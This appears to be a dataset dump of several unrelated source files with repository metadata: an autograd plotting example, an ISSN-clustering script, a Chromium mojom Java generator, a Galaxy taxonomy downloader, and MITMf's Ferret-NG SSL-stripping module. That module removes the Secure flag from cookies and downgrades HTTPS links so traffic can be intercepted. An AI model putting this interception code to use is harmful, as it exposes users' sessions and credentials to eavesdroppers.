field=mdot_rest.optimizedpngfield.OptimizedPNGImageField(blank=True, null=True, upload_to='uploads'),
),
]
| apache-2.0 | 7,037,338,330,995,369,000 | 34.813953 | 139 | 0.601299 | false |
kcarnold/autograd | examples/sinusoid.py | 3 | 1098 | from __future__ import absolute_import
from __future__ import print_function
import autograd.numpy as np
import matplotlib.pyplot as plt
from autograd import grad
from builtins import range, map
def fun(x):
return np.sin(x)
d_fun = grad(fun) # First derivative
dd_fun = grad(d_fun) # Second derivative
x = np.linspace(-10, 10, 100)
plt.plot(x, list(map(fun, x)), x, list(map(d_fun, x)), x, list(map(dd_fun, x)))
plt.xlim([-10, 10])
plt.ylim([-1.2, 1.2])
plt.axis('off')
plt.savefig("sinusoid.png")
plt.clf()
# Taylor approximation to sin function
def fun(x):
currterm = x
ans = currterm
for i in range(1000):
print(i, end=' ')
currterm = - currterm * x ** 2 / ((2 * i + 3) * (2 * i + 2))
ans = ans + currterm
if np.abs(currterm) < 0.2: break # (Very generous tolerance!)
return ans
d_fun = grad(fun)
dd_fun = grad(d_fun)
x = np.linspace(-10, 10, 100)
plt.plot(x, list(map(fun, x)), x, list(map(d_fun, x)), x, list(map(dd_fun, x)))
plt.xlim([-10, 10])
plt.ylim([-1.2, 1.2])
plt.axis('off')
plt.savefig("sinusoid_taylor.png")
plt.clf()
| mit | -1,790,430,366,374,978,300 | 23.4 | 79 | 0.619308 | false |
DOAJ/doaj | portality/migrate/st2cl/cluster2.py | 1 | 7506 | from lxml import etree
from copy import deepcopy
import csv
IN = "/home/richard/Dropbox/Documents/DOAJ/data/journals"
OUT = "/home/richard/tmp/doaj/equiv.csv"
def extract_issns(element):
    # Collect every ISSN variant (print/electronic, current/next/previous)
    # attached to a journal record.
    issns = []
    for tag in ("issn", "nextIssn", "previousIssn",
                "eissn", "nextEissn", "previousEissn"):
        value = element.find(tag).text
        if value is not None:
            issns.append(value)
    return issns
f = open(IN)
xml = etree.parse(f)
f.close()
journals = xml.getroot()
journaltable = {}
idtable = {}
reltable = {}
# first job is to separate the journals and the issns, joined by a common id
# and to index each issn to the id in which it appears
id = 0
for j in journals:
journaltable[id] = j
idtable[id] = extract_issns(j)
for issn in idtable[id]:
if issn in reltable:
reltable[issn].append(id)
else:
reltable[issn] = [id]
id += 1
print(len(journals), "journal records; ", len(list(idtable.keys())), "join identifiers; ", len(list(reltable.keys())), "unique issns")
count_register = {}
for id, issns in idtable.items():
size = len(issns)
if size in count_register:
count_register[size] += 1
else:
count_register[size] = 1
print("journal record to issn count statistics: ", count_register)
mapregister = {}
for issn, ids in reltable.items():
size = len(ids)
if size in mapregister:
mapregister[size] += 1
else:
mapregister[size] = 1
print("issn to journal record count statistics: ", mapregister)
def process(id, register):
if id in register:
return
register.append(id)
queue = []
issns = idtable.get(id, [])
for issn in issns:
ids = reltable.get(issn, [])
for i in ids:
if i in register: continue
if i not in queue: queue.append(i)
for q in queue:
process(q, register)
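# Build the equivalence classes: each entry maps an equivalence number to the
# list of join ids whose ISSNs link them together.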
equiv_table = {}
processed = []
i = 0
for id in idtable.keys():
if id in processed:
continue
register = []
process(id, register)
processed += deepcopy(register)
equiv_table[i] = deepcopy(register)
i += 1
print(len(processed), "join ids considered")
process_register = {}
for p in processed:
if p in process_register:
process_register[p] += 1
else:
process_register[p] = 1
multiples = [(k, v) for k, v in process_register.items() if v > 1]
print("join ids considered more than once:", multiples)
if len(multiples) > 0:
print("issns associated with join ids considered more than once:")
for k, v in multiples:
issns = idtable.get(k)
print(k, "->", issns)
for issn in issns:
print(" ", issn, "->", reltable.get(issn, []))
for rel in reltable.get(issn, []):
print(" ", rel, "->", idtable.get(rel))
print(len(equiv_table.keys()), "equivalences identified")
equivregister = {}
idregister = {}
multiequiv = {}
counter = 0
for i, ids in equiv_table.items():
# count the size of the equivalences
size = len(ids)
if size in equivregister:
equivregister[size] += 1
else:
equivregister[size] = 1
# determine the count of ids in the equivalence table
for jid in ids:
if jid in idregister:
idregister[jid] += 1
else:
idregister[jid] = 1
# build a list of all those equivalences which have more than one journal record
if size > 1:
multiequiv[i] = ids
counter += size
multiids = [(k, v) for k, v in idregister.items() if v > 1]
print("equivalence register statistics: ", equivregister)
print("join ids which appear in more than one equivalence", multiids)
print(counter, "total issns in equivalence table")
for k, v in multiequiv.items():
print(k, "->", v)
for jid in v:
print(" ", jid, "->", idtable.get(jid))
ordertables = {}
for e, jids in multiequiv.items():
ordertable = {}
for jid in jids:
ordertable[jid] = {"n" : [], "p": []}
element = journaltable.get(jid)
ne = element.find("nextEissn").text
np = element.find("nextIssn").text
pe = element.find("previousEissn").text
pp = element.find("previousIssn").text
if ne is not None: ne = ne.upper()
if np is not None: np = np.upper()
if pe is not None: pe = pe.upper()
if pp is not None: pp = pp.upper()
for jid2 in jids:
if jid2 == jid: continue
e2 = journaltable.get(jid2)
eissn = e2.find("issn").text
pissn = e2.find("eissn").text
if eissn is not None: eissn = eissn.upper()
if pissn is not None: pissn = pissn.upper()
if (ne is not None and ne in [pissn, eissn]) or (np is not None and np in [pissn, eissn]):
ordertable[jid]["n"].append(jid2)
if (pe is not None and pe in [pissn, eissn]) or (pp is not None and pp in [pissn, eissn]):
ordertable[jid]["p"].append(jid2)
ordertables[e] = ordertable
"""
print "equivalences and their ordered relations of join identifiers"
for e, o in ordertables.items():
print e, "->", o
"""
sorttable = {}
for e, ot in ordertables.items():
first = []
last = []
middle = []
for k, r in ot.items():
if len(r.get("n")) == 0:
first.append(k)
elif len(r.get("p")) == 0:
last.append(k)
else:
middle.append(k)
sorttable[e] = first + middle + last
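# Pick a canonical record for each equivalence: prefer the first record flagged
# doaj == "Y", falling back to the first record in sort order; the remaining
# records become its history.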
canontable = {}
for e, sort in sorttable.items():
canon = None
i = 0
found = False
for s in sort:
element = journaltable.get(s)
doaj = element.find("doaj").text
if doaj is not None and doaj.upper() == "Y":
canon = s
found = True
break
i += 1
if not found:
i = 0
canon = sort[0]
rest = deepcopy(sort)
del rest[i]
canontable[e] = (canon, rest)
print("canonicalised, ordered equivalences and the relations they are derived from")
for k in list(ordertables.keys()):
print(k, "->", ordertables.get(k))
print(" ->", sorttable.get(k))
print(" ->", canontable.get(k))
def get_issn_cell(jid):
element = journaltable.get(jid)
issn = element.find("issn").text
eissn = element.find("eissn").text
issns = []
if issn is not None: issns.append(issn)
if eissn is not None: issns.append(eissn)
cell = ", ".join(issns)
return cell
def get_title_cell(jid):
element = journaltable.get(jid)
title = element.find("title").text.encode("ascii", "ignore")
return title
f = open(OUT, "wb")
writer = csv.writer(f)
writer.writerow(["Equivalence Number", "Proposed Current Title", "Proposed Current ISSNs", "Proposed History: Title/ISSNs"])
for e, data in canontable.items():
canon, rest = data
cells = [e]
canon_issn_cell = get_issn_cell(canon)
cells.append(get_title_cell(canon))
cells.append(canon_issn_cell)
for r in rest:
r_issn_cell = get_issn_cell(r)
cells.append(get_title_cell(r))
cells.append(r_issn_cell)
writer.writerow(cells)
| apache-2.0 | -4,878,603,315,626,738,000 | 26.903346 | 134 | 0.593125 | false |
android-ia/platform_external_chromium_org | mojo/public/tools/bindings/generators/mojom_java_generator.py | 25 | 17838 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates java source files from a mojom.Module."""
import argparse
import ast
import contextlib
import os
import re
import shutil
import tempfile
import zipfile
from jinja2 import contextfilter
import mojom.generate.generator as generator
import mojom.generate.module as mojom
from mojom.generate.template_expander import UseJinja
GENERATOR_PREFIX = 'java'
_HEADER_SIZE = 8
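# Number of bytes in the data header that precedes every serialized mojom struct.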
_spec_to_java_type = {
mojom.BOOL.spec: 'boolean',
mojom.DCPIPE.spec: 'org.chromium.mojo.system.DataPipe.ConsumerHandle',
mojom.DOUBLE.spec: 'double',
mojom.DPPIPE.spec: 'org.chromium.mojo.system.DataPipe.ProducerHandle',
mojom.FLOAT.spec: 'float',
mojom.HANDLE.spec: 'org.chromium.mojo.system.UntypedHandle',
mojom.INT16.spec: 'short',
mojom.INT32.spec: 'int',
mojom.INT64.spec: 'long',
mojom.INT8.spec: 'byte',
mojom.MSGPIPE.spec: 'org.chromium.mojo.system.MessagePipeHandle',
mojom.NULLABLE_DCPIPE.spec:
'org.chromium.mojo.system.DataPipe.ConsumerHandle',
mojom.NULLABLE_DPPIPE.spec:
'org.chromium.mojo.system.DataPipe.ProducerHandle',
mojom.NULLABLE_HANDLE.spec: 'org.chromium.mojo.system.UntypedHandle',
mojom.NULLABLE_MSGPIPE.spec: 'org.chromium.mojo.system.MessagePipeHandle',
mojom.NULLABLE_SHAREDBUFFER.spec:
'org.chromium.mojo.system.SharedBufferHandle',
mojom.NULLABLE_STRING.spec: 'String',
mojom.SHAREDBUFFER.spec: 'org.chromium.mojo.system.SharedBufferHandle',
mojom.STRING.spec: 'String',
mojom.UINT16.spec: 'short',
mojom.UINT32.spec: 'int',
mojom.UINT64.spec: 'long',
mojom.UINT8.spec: 'byte',
}
_spec_to_decode_method = {
mojom.BOOL.spec: 'readBoolean',
mojom.DCPIPE.spec: 'readConsumerHandle',
mojom.DOUBLE.spec: 'readDouble',
mojom.DPPIPE.spec: 'readProducerHandle',
mojom.FLOAT.spec: 'readFloat',
mojom.HANDLE.spec: 'readUntypedHandle',
mojom.INT16.spec: 'readShort',
mojom.INT32.spec: 'readInt',
mojom.INT64.spec: 'readLong',
mojom.INT8.spec: 'readByte',
mojom.MSGPIPE.spec: 'readMessagePipeHandle',
mojom.NULLABLE_DCPIPE.spec: 'readConsumerHandle',
mojom.NULLABLE_DPPIPE.spec: 'readProducerHandle',
mojom.NULLABLE_HANDLE.spec: 'readUntypedHandle',
mojom.NULLABLE_MSGPIPE.spec: 'readMessagePipeHandle',
mojom.NULLABLE_SHAREDBUFFER.spec: 'readSharedBufferHandle',
mojom.NULLABLE_STRING.spec: 'readString',
mojom.SHAREDBUFFER.spec: 'readSharedBufferHandle',
mojom.STRING.spec: 'readString',
mojom.UINT16.spec: 'readShort',
mojom.UINT32.spec: 'readInt',
mojom.UINT64.spec: 'readLong',
mojom.UINT8.spec: 'readByte',
}
_java_primitive_to_boxed_type = {
'boolean': 'Boolean',
'byte': 'Byte',
'double': 'Double',
'float': 'Float',
'int': 'Integer',
'long': 'Long',
'short': 'Short',
}
def NameToComponent(name):
# insert '_' between anything and a Title name (e.g, HTTPEntry2FooBar ->
# HTTP_Entry2_FooBar)
name = re.sub('([^_])([A-Z][^A-Z_]+)', r'\1_\2', name)
# insert '_' between non upper and start of upper blocks (e.g.,
# HTTP_Entry2_FooBar -> HTTP_Entry2_Foo_Bar)
name = re.sub('([^A-Z_])([A-Z])', r'\1_\2', name)
return [x.lower() for x in name.split('_')]
def UpperCamelCase(name):
return ''.join([x.capitalize() for x in NameToComponent(name)])
def CamelCase(name):
uccc = UpperCamelCase(name)
return uccc[0].lower() + uccc[1:]
def ConstantStyle(name):
components = NameToComponent(name)
if components[0] == 'k':
components = components[1:]
return '_'.join([x.upper() for x in components])
def GetNameForElement(element):
if (mojom.IsEnumKind(element) or mojom.IsInterfaceKind(element) or
mojom.IsStructKind(element)):
return UpperCamelCase(element.name)
if mojom.IsInterfaceRequestKind(element):
return GetNameForElement(element.kind)
if isinstance(element, (mojom.Method,
mojom.Parameter,
mojom.Field)):
return CamelCase(element.name)
if isinstance(element, mojom.EnumValue):
return (GetNameForElement(element.enum) + '.' +
ConstantStyle(element.name))
if isinstance(element, (mojom.NamedValue,
mojom.Constant)):
return ConstantStyle(element.name)
  raise Exception('Unexpected element: %s' % element)
def GetInterfaceResponseName(method):
return UpperCamelCase(method.name + 'Response')
def ParseStringAttribute(attribute):
assert isinstance(attribute, basestring)
return attribute
def GetJavaTrueFalse(value):
return 'true' if value else 'false'
def GetArrayNullabilityFlags(kind):
"""Returns nullability flags for an array type, see Decoder.java.
As we have dedicated decoding functions for arrays, we have to pass
nullability information about both the array itself, as well as the array
element type there.
"""
assert mojom.IsAnyArrayKind(kind)
ARRAY_NULLABLE = \
'org.chromium.mojo.bindings.BindingsHelper.ARRAY_NULLABLE'
ELEMENT_NULLABLE = \
'org.chromium.mojo.bindings.BindingsHelper.ELEMENT_NULLABLE'
NOTHING_NULLABLE = \
'org.chromium.mojo.bindings.BindingsHelper.NOTHING_NULLABLE'
flags_to_set = []
if mojom.IsNullableKind(kind):
flags_to_set.append(ARRAY_NULLABLE)
if mojom.IsNullableKind(kind.kind):
flags_to_set.append(ELEMENT_NULLABLE)
if not flags_to_set:
flags_to_set = [NOTHING_NULLABLE]
return ' | '.join(flags_to_set)
def AppendEncodeDecodeParams(initial_params, context, kind, bit):
""" Appends standard parameters shared between encode and decode calls. """
params = list(initial_params)
if (kind == mojom.BOOL):
params.append(str(bit))
if mojom.IsReferenceKind(kind):
if mojom.IsAnyArrayKind(kind):
params.append(GetArrayNullabilityFlags(kind))
else:
params.append(GetJavaTrueFalse(mojom.IsNullableKind(kind)))
if mojom.IsAnyArrayKind(kind):
if mojom.IsFixedArrayKind(kind):
params.append(str(kind.length))
else:
params.append(
'org.chromium.mojo.bindings.BindingsHelper.UNSPECIFIED_ARRAY_LENGTH');
if mojom.IsInterfaceKind(kind):
params.append('%s.MANAGER' % GetJavaType(context, kind))
if mojom.IsAnyArrayKind(kind) and mojom.IsInterfaceKind(kind.kind):
params.append('%s.MANAGER' % GetJavaType(context, kind.kind))
return params
@contextfilter
def DecodeMethod(context, kind, offset, bit):
def _DecodeMethodName(kind):
if mojom.IsAnyArrayKind(kind):
return _DecodeMethodName(kind.kind) + 's'
if mojom.IsEnumKind(kind):
return _DecodeMethodName(mojom.INT32)
if mojom.IsInterfaceRequestKind(kind):
return 'readInterfaceRequest'
if mojom.IsInterfaceKind(kind):
return 'readServiceInterface'
return _spec_to_decode_method[kind.spec]
methodName = _DecodeMethodName(kind)
params = AppendEncodeDecodeParams([ str(offset) ], context, kind, bit)
return '%s(%s)' % (methodName, ', '.join(params))
@contextfilter
def EncodeMethod(context, kind, variable, offset, bit):
params = AppendEncodeDecodeParams(
[ variable, str(offset) ], context, kind, bit)
return 'encode(%s)' % ', '.join(params)
def GetPackage(module):
if 'JavaPackage' in module.attributes:
return ParseStringAttribute(module.attributes['JavaPackage'])
# Default package.
return 'org.chromium.mojom.' + module.namespace
def GetNameForKind(context, kind):
def _GetNameHierachy(kind):
hierachy = []
if kind.parent_kind:
hierachy = _GetNameHierachy(kind.parent_kind)
hierachy.append(GetNameForElement(kind))
return hierachy
module = context.resolve('module')
elements = []
if GetPackage(module) != GetPackage(kind.module):
elements += [GetPackage(kind.module)]
elements += _GetNameHierachy(kind)
return '.'.join(elements)
def GetBoxedJavaType(context, kind):
unboxed_type = GetJavaType(context, kind, False)
if unboxed_type in _java_primitive_to_boxed_type:
return _java_primitive_to_boxed_type[unboxed_type]
return unboxed_type
@contextfilter
def GetJavaType(context, kind, boxed=False):
if boxed:
return GetBoxedJavaType(context, kind)
if mojom.IsStructKind(kind) or mojom.IsInterfaceKind(kind):
return GetNameForKind(context, kind)
if mojom.IsInterfaceRequestKind(kind):
return ('org.chromium.mojo.bindings.InterfaceRequest<%s>' %
GetNameForKind(context, kind.kind))
if mojom.IsAnyArrayKind(kind):
return '%s[]' % GetJavaType(context, kind.kind)
if mojom.IsEnumKind(kind):
return 'int'
return _spec_to_java_type[kind.spec]
@contextfilter
def DefaultValue(context, field):
assert field.default
if isinstance(field.kind, mojom.Struct):
assert field.default == 'default'
return 'new %s()' % GetJavaType(context, field.kind)
return '(%s) %s' % (
GetJavaType(context, field.kind),
ExpressionToText(context, field.default, kind_spec=field.kind.spec))
@contextfilter
def ConstantValue(context, constant):
return '(%s) %s' % (
GetJavaType(context, constant.kind),
ExpressionToText(context, constant.value, kind_spec=constant.kind.spec))
@contextfilter
def NewArray(context, kind, size):
if mojom.IsAnyArrayKind(kind.kind):
return NewArray(context, kind.kind, size) + '[]'
return 'new %s[%s]' % (GetJavaType(context, kind.kind), size)
@contextfilter
def ExpressionToText(context, token, kind_spec=''):
def _TranslateNamedValue(named_value):
entity_name = GetNameForElement(named_value)
if named_value.parent_kind:
return GetJavaType(context, named_value.parent_kind) + '.' + entity_name
# Handle the case where named_value is a module level constant:
if not isinstance(named_value, mojom.EnumValue):
entity_name = (GetConstantsMainEntityName(named_value.module) + '.' +
entity_name)
if GetPackage(named_value.module) == GetPackage(context.resolve('module')):
return entity_name
return GetPackage(named_value.module) + '.' + entity_name
if isinstance(token, mojom.NamedValue):
return _TranslateNamedValue(token)
if kind_spec.startswith('i') or kind_spec.startswith('u'):
# Add Long suffix to all integer literals.
number = ast.literal_eval(token.lstrip('+ '))
if not isinstance(number, (int, long)):
raise ValueError('got unexpected type %r for int literal %r' % (
type(number), token))
# If the literal is too large to fit a signed long, convert it to the
# equivalent signed long.
if number >= 2 ** 63:
number -= 2 ** 64
return '%dL' % number
if isinstance(token, mojom.BuiltinValue):
if token.value == 'double.INFINITY':
return 'java.lang.Double.POSITIVE_INFINITY'
if token.value == 'double.NEGATIVE_INFINITY':
return 'java.lang.Double.NEGATIVE_INFINITY'
if token.value == 'double.NAN':
return 'java.lang.Double.NaN'
if token.value == 'float.INFINITY':
return 'java.lang.Float.POSITIVE_INFINITY'
if token.value == 'float.NEGATIVE_INFINITY':
return 'java.lang.Float.NEGATIVE_INFINITY'
if token.value == 'float.NAN':
return 'java.lang.Float.NaN'
return token
def IsPointerArrayKind(kind):
if not mojom.IsAnyArrayKind(kind):
return False
sub_kind = kind.kind
return mojom.IsObjectKind(sub_kind)
def GetResponseStructFromMethod(method):
return generator.GetDataHeader(
False, generator.GetResponseStructFromMethod(method))
def GetStructFromMethod(method):
return generator.GetDataHeader(
False, generator.GetStructFromMethod(method))
def GetConstantsMainEntityName(module):
if 'JavaConstantsClassName' in module.attributes:
return ParseStringAttribute(module.attributes['JavaConstantsClassName'])
# This constructs the name of the embedding classes for module level constants
# by extracting the mojom's filename and prepending it to Constants.
return (UpperCamelCase(module.path.split('/')[-1].rsplit('.', 1)[0]) +
'Constants')
def GetMethodOrdinalName(method):
return ConstantStyle(method.name) + '_ORDINAL'
def HasMethodWithResponse(interface):
for method in interface.methods:
if method.response_parameters:
return True
return False
def HasMethodWithoutResponse(interface):
for method in interface.methods:
if not method.response_parameters:
return True
return False
@contextlib.contextmanager
def TempDir():
dirname = tempfile.mkdtemp()
try:
yield dirname
finally:
shutil.rmtree(dirname)
def ZipContentInto(root, zip_filename):
with zipfile.ZipFile(zip_filename, 'w') as zip_file:
for dirname, _, files in os.walk(root):
for filename in files:
path = os.path.join(dirname, filename)
path_in_archive = os.path.relpath(path, root)
zip_file.write(path, path_in_archive)
class Generator(generator.Generator):
java_filters = {
'interface_response_name': GetInterfaceResponseName,
'constant_value': ConstantValue,
'default_value': DefaultValue,
'decode_method': DecodeMethod,
'expression_to_text': ExpressionToText,
'encode_method': EncodeMethod,
'has_method_with_response': HasMethodWithResponse,
'has_method_without_response': HasMethodWithoutResponse,
'is_fixed_array_kind': mojom.IsFixedArrayKind,
'is_handle': mojom.IsNonInterfaceHandleKind,
'is_nullable_kind': mojom.IsNullableKind,
'is_pointer_array_kind': IsPointerArrayKind,
'is_struct_kind': mojom.IsStructKind,
'java_type': GetJavaType,
'java_true_false': GetJavaTrueFalse,
'method_ordinal_name': GetMethodOrdinalName,
'name': GetNameForElement,
'new_array': NewArray,
'response_struct_from_method': GetResponseStructFromMethod,
'struct_from_method': GetStructFromMethod,
'struct_size': lambda ps: ps.GetTotalSize() + _HEADER_SIZE,
}
def GetJinjaExports(self):
return {
'package': GetPackage(self.module),
}
def GetJinjaExportsForInterface(self, interface):
exports = self.GetJinjaExports()
exports.update({'interface': interface})
if interface.client:
for client in self.module.interfaces:
if client.name == interface.client:
exports.update({'client': client})
return exports
@UseJinja('java_templates/enum.java.tmpl', filters=java_filters)
def GenerateEnumSource(self, enum):
exports = self.GetJinjaExports()
exports.update({'enum': enum})
return exports
@UseJinja('java_templates/struct.java.tmpl', filters=java_filters)
def GenerateStructSource(self, struct):
exports = self.GetJinjaExports()
exports.update({'struct': struct})
return exports
@UseJinja('java_templates/interface.java.tmpl', filters=java_filters)
def GenerateInterfaceSource(self, interface):
return self.GetJinjaExportsForInterface(interface)
@UseJinja('java_templates/interface_internal.java.tmpl', filters=java_filters)
def GenerateInterfaceInternalSource(self, interface):
return self.GetJinjaExportsForInterface(interface)
@UseJinja('java_templates/constants.java.tmpl', filters=java_filters)
def GenerateConstantsSource(self, module):
exports = self.GetJinjaExports()
exports.update({'main_entity': GetConstantsMainEntityName(module),
'constants': module.constants})
return exports
def DoGenerateFiles(self):
if not os.path.exists(self.output_dir):
try:
os.makedirs(self.output_dir)
except:
# Ignore errors on directory creation.
pass
# Keep this above the others as .GetStructs() changes the state of the
# module, annotating structs with required information.
for struct in self.GetStructs():
self.Write(self.GenerateStructSource(struct),
'%s.java' % GetNameForElement(struct))
for enum in self.module.enums:
self.Write(self.GenerateEnumSource(enum),
'%s.java' % GetNameForElement(enum))
for interface in self.module.interfaces:
self.Write(self.GenerateInterfaceSource(interface),
'%s.java' % GetNameForElement(interface))
self.Write(self.GenerateInterfaceInternalSource(interface),
'%s_Internal.java' % GetNameForElement(interface))
if self.module.constants:
self.Write(self.GenerateConstantsSource(self.module),
'%s.java' % GetConstantsMainEntityName(self.module))
def GenerateFiles(self, unparsed_args):
parser = argparse.ArgumentParser()
parser.add_argument('--java_output_directory', dest='java_output_directory')
args = parser.parse_args(unparsed_args)
package_path = GetPackage(self.module).replace('.', '/')
# Generate the java files in a temporary directory and place a single
# srcjar in the output directory.
zip_filename = os.path.join(self.output_dir,
"%s.srcjar" % self.module.name)
with TempDir() as temp_java_root:
self.output_dir = os.path.join(temp_java_root, package_path)
self.DoGenerateFiles();
ZipContentInto(temp_java_root, zip_filename)
if args.java_output_directory:
# If requested, generate the java files directly into indicated directory.
self.output_dir = os.path.join(args.java_output_directory, package_path)
self.DoGenerateFiles();
def GetJinjaParameters(self):
return {
'lstrip_blocks': True,
'trim_blocks': True,
}
def GetGlobals(self):
return {
'namespace': self.module.namespace,
'module': self.module,
}
| bsd-3-clause | 5,533,580,926,936,481,000 | 34.819277 | 80 | 0.693127 | false |
czervenka/gapi | gapi/api/reports.py | 1 | 2192 | # Copyright 2013 Lukas Marek <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import date, datetime, timedelta
from ..gapi_utils import api_fetch
from ..client import ApiService, ApiResource, value_to_gdata
__author__ = 'Robin Gottfried <[email protected]>'
# https://www.googleapis.com/admin/reports/v1/activity/users/{userKey}/applications/{applicationName}
class Service(ApiService):
_base_url = 'https://www.googleapis.com/admin/reports/v1'
_default_scope = 'https://www.googleapis.com/auth/admin.reports.usage.readonly'
@property
def _resources(self):
return [Usage]
ApiService._services['reports'] = Service
class Usage(ApiResource):
_name = 'usage'
_methods = 'get', 'get_latest',
_base_path = '/usage/users/{user}/dates/{date}'
def _api_get(self, user, day, **kwargs):
if isinstance(day, (datetime, date)):
day = day.strftime('%Y-%m-%d')
url = self._base_url.format(user=user, date=day)
return self._service.fetch(url, method='GET', params=kwargs)
def _api_get_latest(self, user, max_age=8, **kwargs):
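        # Reports for recent days may not exist yet; keep looking further back
        # (doubling the lookback whenever the API answers 400 "data not
        # available") until a report is found or max_age is exceeded.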
from ..exceptions import GoogleApiHttpException
day = date.today()
age = 1
result = None
while not result and age <= max_age:
try:
result = self._api_get(user, day-timedelta(age), **kwargs)
except GoogleApiHttpException, e:
                # would be nice if Google returned useful information when
                # the data is simply not available
if e.code == 400:
age *= 2
else:
raise
return result
| apache-2.0 | 955,231,716,949,358,300 | 32.212121 | 101 | 0.645529 | false |
sechacking/MITMf | core/ferretng/SSLServerConnection.py | 28 | 4133 | # Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from core.logger import logger
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
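# Illustrative note (added): for a page served from
# https://example.com/shop/cart.html that contains <img src="images/logo.png">,
# buildAbsoluteLink() records http://example.com/shop/images/logo.png with the
# URLMonitor, so the stripped (plain-HTTP) request the client makes later can
# be recognised as one that must be fetched over SSL.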
| gpl-3.0 | 8,449,833,640,115,345,000 | 41.608247 | 146 | 0.649891 | false |
mintuhouse/shotfactory | build/lib.linux-x86_64-2.6/shotfactory04/gui/linux/iceweasel.py | 2 | 1088 | # browsershots.org - Test your web design in different browsers
# Copyright (C) 2007 Johann C. Rocholl <[email protected]>
#
# Browsershots is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Browsershots is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
GUI-specific interface functions for X11.
"""
__revision__ = "$Rev: 2248 $"
__date__ = "$Date: 2007-10-26 15:46:36 +0530 (Fri, 26 Oct 2007) $"
__author__ = "$Author: johann $"
from shotfactory04.gui.linux import firefox as base
class Gui(base.Gui):
"""
Special functions for GNU Iceweasel.
"""
pass
| gpl-3.0 | -2,403,643,058,900,670,500 | 31.969697 | 70 | 0.724265 | false |
galaxyproject/tools-iuc | data_managers/data_manager_fetch_ncbi_taxonomy/data_manager/data_manager.py | 9 | 4462 | import argparse
import datetime
import json
import os
import shutil
import tarfile
import zipfile
from urllib.request import Request, urlopen
def url_download(url, workdir):
file_path = os.path.join(workdir, 'download.dat')
if not os.path.exists(workdir):
os.makedirs(workdir)
src = None
dst = None
try:
req = Request(url)
src = urlopen(req)
with open(file_path, 'wb') as dst:
while True:
chunk = src.read(2**10)
if chunk:
dst.write(chunk)
else:
break
finally:
if src:
src.close()
if tarfile.is_tarfile(file_path):
fh = tarfile.open(file_path, 'r:*')
elif zipfile.is_zipfile(file_path):
fh = zipfile.ZipFile(file_path, 'r')
else:
return
fh.extractall(workdir)
os.remove(file_path)
def download_name_maps(url, workdir, partial):
if partial:
map_files = [
'pdb.accession2taxid.gz',
]
else:
map_files = [
'dead_nucl.accession2taxid.gz',
'dead_prot.accession2taxid.gz',
'dead_wgs.accession2taxid.gz',
'nucl_gb.accession2taxid.gz',
